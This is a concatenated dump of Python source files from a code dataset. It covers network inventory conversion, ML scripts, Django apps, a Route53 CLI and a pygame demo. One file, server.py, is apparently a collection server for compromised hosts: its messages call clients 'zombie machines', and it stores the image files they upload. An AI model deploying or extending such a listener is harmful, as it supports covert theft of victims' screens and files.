projecthost_a_record = host.ARecord(host=projecthost_host, name=\"projecthost.wh2.tu-dresden.de\",\n address=projecthost_ip)\n a_records.append(projecthost_a_record)\n\n #linkpartner\n linkpartner_net_device = host.ServerNetDevice(mac=\"00:16:3e:cc:8a:f9\")\n server_net_devices.append(linkpartner_net_device)\n linkpartner_ip = host.Ip(address=\"141.30.228.11\",net_device=linkpartner_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(linkpartner_ip)\n linkpartner_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n linkpartner_net_device.host = linkpartner_host\n server_hosts.append(linkpartner_host)\n 
linkpartner_a_record = host.ARecord(host=linkpartner_host, name=\"linkpartner.wh2.tu-dresden.de\",\n address=linkpartner_ip)\n a_records.append(linkpartner_a_record)\n\n #kik\n kik_net_device = host.ServerNetDevice(mac=\"00:16:3e:1f:7e:25\")\n server_net_devices.append(kik_net_device)\n kik_ip = host.Ip(address=\"141.30.228.12\",net_device=kik_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(kik_ip)\n kik_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n kik_net_device.host = kik_host\n server_hosts.append(kik_host)\n kik_a_record = host.ARecord(host=kik_host, name=\"kik.wh2.tu-dresden.de\",\n address=kik_ip)\n a_records.append(kik_a_record)\n\n #pan\n pan_net_device_1 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_1)\n pan_net_device_2 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_2)\n pan_net_device_3 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_3)\n pan_net_device_4 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_4)\n pan_net_device_5 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_5)\n pan_net_device_6 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_6)\n pan_net_device_7 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_7)\n pan_net_device_8 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_8)\n pan_host = host.ServerHost(room=server_room_wu9_dach, user=root, name=\"pan\")\n pan_net_device_1.host = pan_host\n pan_net_device_2.host = pan_host\n pan_net_device_3.host = pan_host\n pan_net_device_4.host = pan_host\n pan_net_device_5.host = pan_host\n pan_net_device_6.host = pan_host\n pan_net_device_7.host = pan_host\n pan_net_device_8.host = pan_host\n server_hosts.append(pan_host)\n pan_ip_1 = host.Ip(address=\"141.30.228.1\",net_device=pan_net_device_1, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(pan_ip_1)\n pan_ip_2 = host.Ip(address=\"141.30.224.1\",net_device=pan_net_device_2, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh6.tu-dresden.de\").one())\n ips.append(pan_ip_2)\n pan_ip_3 = host.Ip(address=\"141.30.223.1\",net_device=pan_net_device_3, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh5.tu-dresden.de\").one())\n ips.append(pan_ip_3)\n pan_ip_4 = host.Ip(address=\"141.30.222.1\",net_device=pan_net_device_4, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh4.tu-dresden.de\").one())\n ips.append(pan_ip_4)\n pan_ip_5 = host.Ip(address=\"141.30.227.1\",net_device=pan_net_device_5, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh3.tu-dresden.de\").one())\n ips.append(pan_ip_5)\n pan_ip_6 = host.Ip(address=\"141.30.226.1\",net_device=pan_net_device_6, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh7.tu-dresden.de\").one())\n ips.append(pan_ip_6)\n pan_ip_7 = host.Ip(address=\"141.30.216.1\",net_device=pan_net_device_7, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh16.tu-dresden.de\").one())\n ips.append(pan_ip_7)\n pan_ip_8 = host.Ip(address=\"141.30.202.1\",net_device=pan_net_device_8, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == 
\"wh30.tu-dresden.de\").one())\n ips.append(pan_ip_8)\n pan_a_record_1 = host.ARecord(host=pan_host, name=\"pan.wh2.tu-dresden.de\",\n address=pan_ip_1)\n a_records.append(pan_a_record_1)\n pan_a_record_2 = host.ARecord(host=pan_host, name=\"pan.wh6.tu-dresden.de\",\n address=pan_ip_2)\n a_records.append(pan_a_record_2)\n pan_a_record_3 = host.ARecord(host=pan_host, name=\"pan.wh5.tu-dresden.de\",\n address=pan_ip_3)\n a_records.append(pan_a_record_3)\n pan_a_record_4 = host.ARecord(host=pan_host, name=\"pan.wh4.tu-dresden.de\",\n address=pan_ip_4)\n a_records.append(pan_a_record_4)\n pan_a_record_5 = host.ARecord(host=pan_host, name=\"pan.wh3.tu-dresden.de\",\n address=pan_ip_5)\n a_records.append(pan_a_record_5)\n pan_a_record_6 = host.ARecord(host=pan_host, name=\"pan.wh7.tu-dresden.de\",\n address=pan_ip_6)\n a_records.append(pan_a_record_6)\n pan_a_record_7 = host.ARecord(host=pan_host, name=\"pan.wh16.tu-dresden.de\",\n address=pan_ip_7)\n a_records.append(pan_a_record_7)\n pan_a_record_8 = host.ARecord(host=pan_host, name=\"pan.wh30.tu-dresden.de\",\n address=pan_ip_8)\n a_records.append(pan_a_record_8)\n\n session.session.add_all(ips)\n session.session.add_all(server_net_devices)\n session.session.add_all(a_records)\n session.session.add_all(server_hosts)\n\n\n\n session.session.commit()\n","sub_path":"legacy/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":21204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"291843967","text":"import mxnet as mx\n\n# 可将以下代码\n# conv1 = mx.sym.Convolution(data=data, name='conv1',\n# kernel=(5, 5), num_filter=32)\n# bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False)\n# act1 = mx.sym.Activation(data=bn1, name='act1', act_type='relu')\n# 化简为\n# Conv_BN_Act(src=data, layer=\"1\", kernel=(5, 5), num_filter=64)\ndef Conv_BN_Act(src, layer, kernel, num_filter):\n BatchNorm = mx.sym.BatchNorm\n\n conv = mx.sym.Convolution(data=src, name=\"conv\"+layer, kernel=kernel,\n num_filter=num_filter)\n bn = BatchNorm(data=conv, name=\"bn\"+layer, fix_gamma=False)\n act = mx.sym.Activation(data=bn, name=\"act\"+layer, act_type=\"relu\")\n return act\n\n\n## 层自动串联\ndata = mx.symbol.Variable(\"data\")\nfor i in range(0, 3):\n net = Conv_BN_Act(data if i == 0 else net, str(i), (3, 3), 128)\n# 等价于\ndata = mx.symbol.Variable(\"data\")\nnet = Conv_BN_Act(data, \"0\", (3, 3), 128)\nnet = Conv_BN_Act(net, \"1\", (3, 3), 128)\nnet = Conv_BN_Act(net, \"2\", (3, 3), 128)\n\n\n","sub_path":"MXNET/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"76316434","text":"from django.contrib import admin\nfrom user.models import User\nfrom django.contrib.auth.admin import UserAdmin\n\n\nclass NewUserAdmin(UserAdmin):\n fieldsets = (\n (None, {'fields': ('username', 'password')}),\n ('Personal info', {'fields': ('first_name', 'last_name', 'email', 'team_name', 'team_id')}),\n ('Permissions', {\n 'fields': ('is_active', 'is_staff', 'is_superuser', 'groups', 'user_permissions'),\n }),\n ('Important dates', {'fields': ('last_login', 'date_joined')}),\n )\n list_display = ('username', 'email', 'first_name', 'last_name', 'team_name', 'is_staff')\n\n def get_readonly_fields(self, request, obj=None):\n if request.user.is_superuser:\n readonly_fields = ('team_id',)\n else:\n readonly_fields = ('team_id', 'team_name')\n return readonly_fields\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n return qs.filter(team_id=request.user.team_id)\n\n def save_model(self, request, obj, form, change):\n super().save_model(request, obj, form, change)\n if obj.team_id is None:\n obj.team_id = request.user.team_id\n obj.team_name = request.user.team_name\n if obj.team_name != request.user.team_name:\n User.objects.filter(team_id=request.user.team_id).update(team_name=obj.team_name)\n obj.save()\n\n\nadmin.site.register(User, NewUserAdmin)\n\nadmin.site.site_header = 'Teamwork管理系统'\nadmin.site.site_title = 'Teamwork管理系统'\nadmin.site.index_title = 'Teamwork管理系统'\n","sub_path":"user/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"132883680","text":"import csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef readdataset(filename):\n \"\"\"readdataset - reads the sunspot data set from the file with filename.\n Returns tuple of (X, t).\"\"\"\n X_str = []\n t_str = []\n with open(filename, newline='') as datafile:\n data_reader = csv.reader(datafile, delimiter=' ')\n for row in data_reader:\n X_str.append(row[0:5])\n t_str.append(row[5])\n\n X = np.array(X_str, dtype=np.float)\n t = np.array(t_str, dtype=np.float)\n return X, t\n\ndef factorial_scalar(n):\n \"\"\"This auxillary function allows for computing factorials of non-integers\"\"\"\n return np.prod(np.arange(1, np.math.floor(n)+1, dtype=np.uint64))\n\ndef factorial(n_vec):\n \"\"\"This auxillary function allows for computing factorials of vectors non-integers\"\"\"\n f = np.vectorize(factorial_scalar)\n return f(n_vec)\n\ndef log_factorial_scalar(n):\n \"\"\"This auxillary function allows for computing the logarithm of factorials of non-integers\n using Stirling's approximation.\"\"\"\n n_floor = np.math.floor(n)\n if n_floor == 0:\n return 0.0\n else:\n return n_floor * np.log(n_floor) - n_floor + 0.5 * np.log(2 * np.pi * n_floor)\n\ndef log_factorial(n_vec):\n \"\"\"This auxillary function allows for computing logarithm of factorials of vectors of non-integers\"\"\"\n f = np.vectorize(log_factorial_scalar)\n return f(n_vec)\n\n\n# Read the training set\nX_train, t_train = readdataset('../data/sunspotsTrainStatML.dt')\n\nN_train, D = X_train.shape\nprint(\"Training set has X dimension D = \" + str(D) + \" and N = \" + str(N_train) + ' samples.')\n\n\n# Read the test set\nX_test, t_test = readdataset('../data/sunspotsTestStatML.dt')\n\nN_test, D_test = X_test.shape\nprint(\"Test set has X dimension D = \" + str(D_test) + \" and N = \" + str(N_test) + ' samples.')\n\n\n# Visualize the data set\nplt.figure()\nplt.plot(X_train[:,4], t_train, 'o')\nplt.title(\"Train\")\nplt.xlabel('X[4]')\nplt.ylabel('t')\n\nplt.figure()\nplt.plot(X_test[:,4], t_test, 'o')\nplt.title(\"Test\")\nplt.xlabel('X[4]')\nplt.ylabel('t')\n\nplt.figure()\nplt.hist(t_train)\nplt.title('Train')\nplt.xlabel('t values')\nplt.ylabel('hist(t)')\n\nplt.figure()\nplt.hist(t_test)\nplt.title('Test')\nplt.xlabel('t values')\nplt.ylabel('hist(t)')\n\n\n#####################################################\n# Add your solution here\n# It is alright to create additional Python scripts,\n# if you find this appropriate.\n#####################################################\n\n\n# This function has been taken from my answer to assignment 1.\n# The assignment was fully made by me and not made in any collaborations.\ndef RMSE(t, tp):\n N = len(t)\n s = 0\n for i in range(N):\n s += np.linalg.norm((t[i] - tp[i]))**2\n s /= N\n s = s**(0.5)\n return s\n\n# The metropolis hasting algorithm\nclass Metropolis_Hasting:\n def __init__(self, X, t, n_accepted_samples, n_burn_in, n_thinning):\n self.X = self.prepare_data(X, axis = 1)\n self.t = t\n self.mu = np.ones(self.X.shape[1])\n self.accepted = []\n self.n_accepted_samples = n_accepted_samples\n self.n_burn_in = n_burn_in\n self.fit(n_thinning)\n self.accepted = np.array(self.accepted)\n\n def prepare_data(self, data, axis = 1):\n new_data = np.insert(data, 0, 1, axis = axis)\n return new_data\n\n def f(self, x, w):\n return np.matmul(w.T, x)\n\n def prior(self):\n rerun = False\n sample = np.random.multivariate_normal(self.mu.T, 0.25 * np.identity(len(self.mu)))\n\n for x in self.X:\n if (not (self.f(x, sample) > 0)):\n rerun = True\n \n 
if (not rerun):\n return sample\n else:\n return self.prior()\n\n def proposal(self, mu):\n rerun = False\n sample = np.random.multivariate_normal(mu.T, 0.1 * np.identity(len(self.mu)))\n\n for x in self.X:\n if (not (self.f(x, sample) > 0)):\n rerun = True\n \n if (not rerun):\n return sample\n else:\n return self.proposal(mu)\n\n def log_posterior(self, w):\n s = 0\n for i in range(len(self.t)):\n s += self.t[i] * np.log(self.f(self.X[i], w)) - self.f(self.X[i], w) - log_factorial_scalar(self.t[i])\n\n s -= 1/(2 * 0.25) * np.matmul(np.subtract(w, self.mu).T, np.subtract(w, self.mu))\n s -= np.log(np.power(np.sqrt(2 * np.pi * 0.25), len(self.mu)))\n\n return s\n\n def acceptance(self, w_new, w_old):\n left_side = 0\n right_side = self.log_posterior(w_new) - self.log_posterior(w_old)\n\n return min(left_side, right_side)\n \n def fit(self, thinning = 5):\n steps = 0\n w_old = self.prior()\n while(len(self.accepted) < self.n_accepted_samples):\n w_new = self.proposal(w_old)\n r = self.acceptance(w_new, w_old)\n u = np.random.uniform(0, 1)\n steps += 1\n if (steps < self.n_burn_in):\n continue\n else:\n if (r >= np.log(u)):\n if (steps % thinning == 0):\n w_old = w_new\n self.accepted.append(w_old)\n else:\n if (steps % thinning == 0):\n self.accepted.append(w_old)\n \n def predict(self, X):\n t = []\n for x in X:\n s = 0\n for w in self.accepted:\n s += self.f(self.prepare_data(x, axis = 0), w)\n \n s /= len(self.accepted)\n t.append(s)\n \n return t\n\n# Constants used in the models\nnumber_of_samples = 3000\nburn_in = 30\nthinning = 5\n\n# The three models\nmodel_1 = Metropolis_Hasting(X_train[:, 4].reshape((-1, 1)), t_train, number_of_samples, burn_in, thinning)\nmodel_1_predictions = model_1.predict(X_test[:, 4].reshape((-1, 1)))\nRMSE_1 = RMSE(t_test, model_1_predictions)\nprint(\"RMSE 1: {}\".format(RMSE_1))\n\nmodel_2 = Metropolis_Hasting(X_train[:, 2:4], t_train, number_of_samples, burn_in, thinning)\nmodel_2_predictions = model_2.predict(X_test[:, 2:4])\nRMSE_2 = RMSE(t_test, model_2_predictions)\nprint(\"RMSE 2: {}\".format(RMSE_2))\n\nmodel_3 = Metropolis_Hasting(X_train, t_train, number_of_samples, burn_in, thinning)\nmodel_3_predictions = model_3.predict(X_test)\nRMSE_3 = RMSE(t_test, model_3_predictions)\nprint(\"RMSE 3: {}\".format(RMSE_3))\n\nplt.figure()\nplt.plot(model_1.accepted[:, 0], model_1.accepted[:, 1], 'bo')\n\nplt.figure()\nplt.scatter(t_test, model_1_predictions, c = \"blue\")\nplt.xlabel(\"True values\")\nplt.ylabel(\"Predictions\")\n\n# Show all figures\nplt.show()","sub_path":"code/sunspot.py","file_name":"sunspot.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
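# Taken in isolation, the accept/reject step of the sampler above reduces to a
# comparison of log quantities (the numbers here are made up for illustration):
import numpy as np
log_ratio = -0.3         # log p(w_new | t) - log p(w_old | t)
r = min(0.0, log_ratio)  # log of min(1, posterior ratio)
u = np.random.uniform(0, 1)
accept = r >= np.log(u)  # equivalent to u <= min(1, ratio)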
+{"seq_id":"479245614","text":"from django.shortcuts import render\nfrom .models import Product\nfrom django.core.paginator import Paginator\nfrom .models import Contact\nfrom math import ceil\n\n# Create your views here.\n\ndef index(request):\n product_objects = Product.objects.all()\n\n ''' \n creating search funtionality always work into forms\n '''\n\n search1 = request.GET.get(\"search1\")\n if search1 != \"\" and search1 is not None:\n product_objects = product_objects.filter(title__icontains=search1)\n\n\n #pagination code for number od slides\n\n paginator = Paginator(product_objects,4)\n page = request.GET.get('page')\n product_objects = paginator.get_page(page)\n\n return render(request,'shop/index.html',{\"product_objects\":product_objects})\n \n\n\n\ndef productview(request,id):\n\n product_object = Product.objects.get(id=id)\n \n return render(request,'shop/productview.html',{\"product_object\":product_object})\n\n\n# // to get the items in checkout form\ndef checkout(request):\n\n if request.method==\"POST\":\n \n items =request.POST['items']\n name =request.POST['name']\n email=request.POST['email']\n phone=request.POST['phone']\n address=request.POST['address']\n total=request.POST['total']\n\n ins=Contact( items=items, name=name , email=email, phone=phone, address=address,total=total)\n ins.save()\n\n return render(request,'shop/checkout.html')\n\n\n\n\n\n ","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"653842763","text":"import __builtin__\nfrom os.path import exists\nimport appscript\nfrom envoy import run\nimport app\n\nclass cls(app.reference.cls):\n calendar = None\n # status\n # allday_event\n # description\n # end_date\n # sequence\n # url\n # summary\n # recurrence\n # location\n # excluded_dates\n # start_date\n # start_date\n # stamp_date\n\n def __init__(self,calendar,reference):\n self.calendar=calendar\n self.reference=reference\n\n def set_dates(self,start,end):\n self.start_date=start\n self.end_date=end\n \n def __str__(self):\n return self.summary\n\nclass list(app.list.cls):\n calendar = None\n def __init__(self, calendar=None,data=[]):\n from calendar import cls\n if calendar:\n if not isinstance(calendar,cls):\n raise TypeError(\"\"\"\"\ninvalid calendar type %s. expected calendar.cls\"\"\" % calendar.__class__)\n if not issubclass(data.__class__,__builtin__.list):\n raise TypeError(\"\"\"\"\ninvalid data type %s. expected [event.cls]\"\"\" % data.__class__)\n self.calendar=calendar\n super(type(self),self).__init__(data,[\"uid\",\"summary\"])\n\n def new(self):\n if self.calendar:\n r=appscript.app('iCal').calendars[appscript.its.uid==self.calendar.uid].\\\n first.events.end.make(new=appscript.k.event)\n return cls(self.calendar,r)\n else:\n raise ValueError(\"calendar undefined\")\n\n @property\n def today(self):\n \"\"\"return list of today events\"\"\"\n if exists(\"/usr/local/bin/icalBuddy\"):\n output = run(\"/usr/local/bin/icalBuddy -nc -eed -uid eventsToday | sed -n '/uid:/p' | tr -d '[:blank:]uid:'\").std_out\n uids=[]\n for l in output.splitlines():\n if len(l) == 36: # uid, not error\n uids.append(l)\n return type(self)(\n self.calendar,\n filter(lambda e:e.uid in uids,self[:])\n ) \n else:\n raise IOError(\"/usr/local/bin/icalBuddy not eixsts\")","sub_path":"ical/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"482708182","text":"import pygame\r\nimport random \r\npygame.init()\r\n\r\npygame.display.set_caption('Move the ball!')\r\n\r\nscreen = pygame.display.set_mode((640, 400))\r\nscreenrect = screen.get_rect()\r\nbackground = pygame.Surface(screen.get_size()).convert() \r\nbackground.fill((255, 255, 255)) #fill background white\r\nscreen.blit(background, (0, 0))\r\n\r\n\r\nball_surface = pygame.Surface((50,50)) \r\nball_surface.set_colorkey((0,0,0)) \r\npygame.draw.circle(ball_surface, (255,0,0), (25,25),25) \r\nball_surface = ball_surface.convert_alpha() # for faster blitting. because transparency, use convert_alpha()\r\nballrect = ball_surface.get_rect()\r\n\r\nclock = pygame.time.Clock()\r\n\r\nFPS = 60\r\nplaytime = 0\r\nx=25 \r\ny=25\r\nspeedx = 20\r\nspeedy = 20\r\nscreen.blit(ball_surface, (x, y)) #blit the ball surface on the screen (on top of background)\r\n\r\nrunning = True\r\n\r\nleft = False\r\nright = False\r\ndown = False\r\nup = False\r\n\r\nwhile running:\r\n milliseconds = clock.tick(FPS) # milliseconds passed since last frame\r\n seconds = milliseconds / 1000.0\r\n playtime += seconds\r\n screen.blit(background, (0, 0))\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n running = False\r\n\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_LEFT] and x>0:\r\n x -= speedx\r\n left = True\r\n right = False\r\n elif keys[pygame.K_RIGHT] and x + ballrect.width < screenrect.width:\r\n x += speedx\r\n left = False\r\n right = True\r\n elif keys[pygame.K_DOWN] and y + ballrect.height < screenrect.height:\r\n y += speedy\r\n up = False\r\n down = True \r\n elif keys[pygame.K_UP] and y>0:\r\n y -= speedy\r\n up = True\r\n down = False \r\n\r\n # paint the ball \r\n screen.blit(ball_surface, (x,y))\r\n\r\n pygame.display.update()\r\n\r\npygame.quit()","sub_path":"lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"295752743","text":"import os\nimport sys\n\nimport pytest\n\n# print(os.path.dirname(__file__))\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"../../\")))\n# print(sys.path)\n\nfrom snakeeyes.app import create_app\n\n\n@pytest.fixture(scope=\"session\")\ndef app():\n \"\"\"\n Setup our flask test app, this only gets executed once.\n\n :return: Flask app\n \"\"\"\n params = {\n \"DEBUG\": False,\n \"TESTING\": True,\n }\n\n _app = create_app(settings_override=params)\n\n # Establish an application context before running the tests\n ctx = _app.app_context()\n ctx.push()\n\n yield _app\n\n ctx.pop()\n\n\n@pytest.fixture(scope=\"function\")\ndef client(app):\n \"\"\"\n Setup an app client, this gets executed for each test function.\n\n :param app: Pytest fixture\n :return: Flask app client\n \"\"\"\n print(type(app))\n yield app.test_client()\n","sub_path":"src/snakeeyes/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"146421019","text":"from __future__ import absolute_import\nimport six\nfrom django.http import Http404\n\nfrom xmodule.modulestore.django import modulestore\n\n\ndef get_course(course_id, depth=0):\n \"\"\"\n Given a course id, return the corresponding course descriptor.\n\n If the course does not exist, raises a ValueError. This is appropriate\n for internal use.\n\n depth: The number of levels of children for the modulestore to cache.\n None means infinite depth. Default is to fetch no children.\n \"\"\"\n course = modulestore().get_course(course_id, depth=depth)\n if course is None:\n raise ValueError(u\"Course not found: {0}\".format(course_id))\n return course\n\n\ndef get_course_by_id(course_key, depth=0):\n \"\"\"\n Given a course id, return the corresponding course descriptor.\n\n If such a course does not exist, raises a 404.\n\n depth: The number of levels of children for the modulestore to cache. None means infinite depth\n \"\"\"\n with modulestore().bulk_operations(course_key):\n course = modulestore().get_course(course_key, depth=depth)\n\n if course:\n return course\n else:\n raise Http404(u\"Course not found: {}.\".format(six.text_type(course_key)))\n","sub_path":"mocks/juniper/lms/djangoapps/courseware/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"134006207","text":"import sys\nfrom check import common\nfrom check import check_domain, list_records, change_records, delete_records\n\ndef verify(argv):\n print(len(argv))\n help = '''route53 is a tool for management of DNS Records\\n\\n\n Basic Commands: \n Please add -h or --help for Assistance\n Options:\n create record/record-set x.x.x.x. 3.3.3.3 => Creates A Record[example create record/record-set example.domain.com. 7.7.7.7 ]\n create hosted/hosted-zone x.x. => Creates Hosted Zone [Example create hosted/hosted-zone example.com. ]\n list hosted/hosted-zone[s] all => Lists all Hosted Zones [Example list hosted/hosted-zone all]\n list record/record-set[s] all => Lists all Record Sets in Hosted Zones [Example list record/record-set all]\n list hosted/hosted-zone x.x.x.x. => Lists Hosted Zone x.x.x.x if present [Example list hosted/hosted-zone example.com. ]\n list record/record-set x.x.x.x. => Lists Record Set x.x.x.x in Hosted Zones if present [Example list record/record-set team.example.com]\n change => Change Record Set\n delete => Delete Record Set\n '''\n\n def create():\n comment= \"Created hosted zone \" + argv[2] \n count=argv[2].count(\".\")\n if argv[1].strip()==\"hosted-zone\" or argv[1].strip()==\"h\" or argv[1].strip()==\"hosted\" and count>=2 and len(argv)==3:\n if argv[2].strip()[-1]!=\".\":\n argv[2] += \".\"\n conn=common()\n try:\n new_zone, change_info = conn.create_hosted_zone(\n argv[2], comment=comment\n )\n print(\"Zone ID \", new_zone.id)\n\n except:\n print(\"Cannot create hosted zone\")\n sys.exit(1)\n\n elif argv[1].strip()==\"record\" or argv[1].strip()==\"record-set\" and count>=2 and len(argv)==4:\n if len(argv[3].split(\".\"))==4:\n if argv[2][-1] != \".\":\n argv[2] += \".\"\n check_domain(argv[2],argv[3])\n\n else:\n print(\"Enter IP Address as X.X.X.X\") \n sys.exit(1)\n else:\n print(\"Invalid Credentials Entered\\n\")\n print(help.split(\":\")[2] )\n sys.exit(1)\n \n def list():\n try:\n list_records(argv[1],argv[2])\n except:\n print(\"Error in number of variables entered\")\n sys.exit(1)\n\n def change():\n try:\n if (argv[2][-1] != \".\"):\n argv[2] += \".\"\n if argv[3][-1] != \".\" and (argv[1]==\"record\" or argv[1]==\"r\"):\n argv[3] += \".\"\n change_records(argv[1],argv[2],argv[3])\n except:\n print(\"invalid credentials\")\n sys.exit(1)\n\n def delete():\n try:\n if (argv[1][-1] != \".\"):\n argv[1] += \".\"\n delete_records(argv[1])\n except:\n print(\"Enter Valid Input\")\n\n if len(argv)<1:\n print (help)\n sys.exit(0)\n\n if len(argv)==1:\n if str(argv[0].strip())==\"-h\" or str(argv[0].strip())==\"--help\":\n print(help.split(\":\")[2] )\n sys.exit(0)\n \n else:\n print(help.split(\":\")[2] ) \n\n elif argv[0].strip()==\"create\" or argv[0].strip()==\"cr\":\n create()\n \n elif argv[0].strip()==\"list\" or argv[0].strip()==\"ls\":\n list()\n\n elif argv[0].strip()==\"change\" or argv[0].strip()==\"ch\":\n change()\n \n elif str(argv[0].strip())==\"delete\" or str(argv[0].strip())==\"dl\":\n delete()\n\n else:\n print(help.split(\":\")[2] )\n sys.exit(1)\n","sub_path":"src/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"329194389","text":"import socket,sys,threading,struct,os\n\ndef service():\n\t#抛出错误\n try:\n \t#创建套接字\n server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #配置端口释放规则,1代表立即释放,默认2min\n server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n serveraddr = (\"\",14444)\n server.bind(serveraddr)\n server.listen(10)\n except socket.error as e:\n print(\"*建立Socket失败,由于:\",e,sep=\"\")\n sys.exit(1)\n\n print(\"Wainting for Connection...\")\n\n #循环,业务等待\n while True:\n #确认链接\n clientsocket,clientaddr = server.accept()\n #多线程\n t = threading.Thread(target=receiveDataFromClient,args=(clientsocket,clientaddr,))\n t.start()\n\n#多线程接收数据\ndef receiveDataFromClient(clientsocket,clientaddr):\n\t#成功连接肉鸡的提示\n print(\"肉鸡来了{}\".format(clientaddr))\n while True:\n \t#设定单次接收图片的数据流大小为128bytes\n fileinfosize = struct.calcsize(\"128sl\")\n fileinfopck = clientsocket.recv(fileinfosize)\n #如果数据流非空\n if fileinfopck:\n \t#解包\n filename,filesize = struct.unpack(\"128sl\",fileinfopck)\n filename = filename.strip(str.encode(\"\\00\"))\n\n #接收图片\n newfilename = os.path.join(str.encode(\"./\"),str.encode(\"new_\")+filename)\n print(\"接收文件{},另存为{}\".format(filename,newfilename))\n\n #统计接收量\n recv_file_size = 0\n #创建缓存文件\n tempfile = open(newfilename,\"wb\")\n #判断分段数据,写入缓存文件\n while not recv_file_size == filesize:\n if filesize - recv_file_size > 1024:\n recvdata = clientsocket.recv(1024)\n recv_file_size += len(recvdata)\n else:\n recvdata = clientsocket.recv(filesize - recv_file_size)\n recv_file_size = filesize\n tempfile.write(recvdata)\n\n tempfile.close()\n print(\"文件接收完成,保存在{}\".format(newfilename))\n \nif __name__ == \"__main__\":\n service()\n \n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"165788457","text":"from keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ReduceLROnPlateau\r\nfrom keras.optimizers import SGD\r\nfrom matplotlib import pyplot as plt\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.applications.vgg19 import VGG19\r\n\r\n\r\nimg_rows, img_cols = 224,224\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n horizontal_flip=True)\r\ntrain_generator = train_datagen.flow_from_directory(\r\n \"C:/Users/pma009/Documents/python/MeliponasImageDatastore227x227_8especies/train\",\r\n target_size=(img_rows,img_cols),\r\n batch_size=32)\r\n\r\nvalidation_datagen = ImageDataGenerator(rescale=1./255)\r\nvalidation_generator = validation_datagen.flow_from_directory(\r\n \"C:/Users/pma009/Documents/python/MeliponasImageDatastore227x227_8especies/test\",\r\n target_size=(img_rows,img_cols),\r\n batch_size=32)\r\n\r\n\r\nmodel = VGG19(include_top=True, weights=None, classes=8)#(include_top=False, weights='imagenet', classes=8)\r\n\r\nearly_stopping = EarlyStopping(monitor='val_loss', patience=5)\r\n\r\noptim = SGD(lr=0.001,momentum=0.6)\r\n# optim = RMSprop(lr=0.001)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=optim, metrics=['accuracy'])\r\nmodel.summary()\r\nhistory = model.fit_generator(train_generator, steps_per_epoch=50, epochs=60, validation_data=validation_generator,validation_steps=50)#,\r\n # callbacks=[early_stopping])#,\r\n # 